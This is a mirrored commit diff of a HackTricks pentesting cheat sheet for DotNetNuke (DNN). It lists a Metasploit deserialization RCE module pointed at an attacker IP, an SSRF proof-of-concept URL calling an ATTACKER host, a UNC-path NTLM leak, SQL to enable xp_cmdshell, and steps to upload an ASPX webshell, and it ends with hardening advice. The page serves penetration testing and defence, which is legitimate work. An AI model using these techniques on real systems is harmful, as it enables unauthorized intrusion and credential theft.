maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Research Update: Enhanced src/network-services-pentesting/pe...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-07-17 16:27:06 +00:00
parent ab9a7eaab4
commit 9b1cd04302
1 changed files with 77 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

101
src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
View File

@ -4,44 +4,97 @@
## DotNetNuke (DNN)
If you enter as **administrator** in DNN it's easy to obtain RCE.
If you enter as **administrator** in DNN it's easy to obtain **RCE**, however a number of *unauthenticated* and *post-auth* techniques have been published in the last few years. The following cheat-sheet collects the most useful primitives for both offensive and defensive work.
## RCE
---
## Version & Environment Enumeration
### Via SQL
* Check the *X-DNN* HTTP response header it usually discloses the exact platform version.
* The installation wizard leaks the version in `/Install/Install.aspx?mode=install` (accessible on very old installs).
* `/API/PersonaBar/GetStatus` (9.x) returns a JSON blob containing `"dnnVersion"` for low-privilege users.
* Typical cookies you will see on a live instance:
* `.DOTNETNUKE` ASP.NET forms authentication ticket.
* `DNNPersonalization` contains XML/serialized user profile data (old versions see RCE below).
A SQL console is accessible under the **`Settings`** page where you can enable **`xp_cmdshell`** and **run operating system commands**.
---
## Unauthenticated Exploitation
Use these lines to enable **`xp_cmdshell`**:
### 1. Cookie Deserialization RCE (CVE-2017-9822 & follow-ups)
*Affected versions ≤ 9.3.0-RC*
`DNNPersonalization` is deserialized on every request when the built-in 404 handler is enabled. Crafted XML can therefore lead to arbitrary gadget chains and code execution.
```
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST <attacker_ip>
msf> run
```
The module automatically chooses the right path for patched but still vulnerable versions (CVE-2018-15811/15812/18325/18326). Exploitation works **without authentication** on 7.x9.1.x and with a *verified* low-privilege account on 9.2.x+.
### 2. Server-Side Request Forgery (CVE-2025-32372)
*Affected versions < 9.13.8 Patch released April 2025*
A bypass of the older `DnnImageHandler` fix enables an attacker to coerce the server to issue **arbitrary GET requests** (semi-blind SSRF). Practical impacts:
* Internal port scan / metadata service discovery in cloud deployments.
* Reach hosts otherwise firewalled from the Internet.
Proof-of-concept (replace `TARGET` & `ATTACKER`):
```
https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
```
The request is triggered in the background; monitor your listener for callbacks.
### 3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)
*Affected versions 6.0.0 9.x (< 10.0.1)*
Specially crafted content can make DNN attempt to fetch a resource using a **UNC path** such as `\\attacker\share\img.png`. Windows will happily perform NTLM negotiation, leaking the server-account hashes to the attacker. Upgrade to **10.0.1** or disable outbound SMB at the firewall.
### 4. IP Filter Bypass (CVE-2025-52487)
If administrators rely on *Host/IP Filters* for admin portal protection, be aware that versions prior to **10.0.1** can be bypassed by manipulating `X-Forwarded-For` in a reverse-proxy scenario.
---
## Post-Authentication to RCE
### Via SQL console
Under **`Settings → SQL`** a built-in query window allows execution against the site database. On Microsoft SQL Server you can enable **`xp_cmdshell`** and spawn commands:
```sql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';
```
And press **"Run Script"** to run that sQL sentences.
### Via ASPX webshell upload
1. Go to **`Settings → Security → More → More Security Settings`**.
2. Append `aspx` (or `asp`) to **Allowable File Extensions** and **Save**.
3. Browse to **`/admin/file-management`** and upload `shell.aspx`.
4. Trigger it at **`/Portals/0/shell.aspx`**.
Then, use something like the following to run OS commands:
---
## Privilege Escalation on Windows
Once code execution is achieved as **IIS AppPool\<Site>**, common Windows privilege-escalation techniques apply. If the box is vulnerable you can leverage:
```sql
xp_cmdshell 'whoami'
```
* **PrintSpoofer** / **SpoolFool** to abuse *SeImpersonatePrivilege*.
* **Juicy/Sharp Potatoes** to escape *Service Accounts*.
### Via ASP webshell
---
## Hardening Recommendations (Blue Team)
In `Settings -> Security -> More -> More Security Settings` you can **add new allowed extensions** under `Allowable File Extensions`, and then clicking the `Save` button.
* **Upgrade** to at least **9.13.9** (fixes SSRF bypass) or preferably **10.0.1** (IP filter & NTLM issues).
* Remove residual **`InstallWizard.aspx*`** files after installation.
* Disable outbound SMB (ports 445/139) egress.
* Enforce strong *Host Filters* on the edge proxy rather than within DNN.
* Block access to `/API/RemoteContentProxy` if unused.
Add **`asp`** or **`aspx`** and then in **`/admin/file-management`** upload an **asp webshell** called `shell.asp` for example.
Then access to **`/Portals/0/shell.asp`** to access your webshell.
### Privilege Escalation
You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for example.
## References
* Metasploit `dnn_cookie_deserialization_rce` module documentation practical unauthenticated RCE details (GitHub).
* GitHub Security Advisory GHSA-3f7v-qx94-666m 2025 SSRF bypass & patch information.
{{#include ../../banners/hacktricks-training.md}}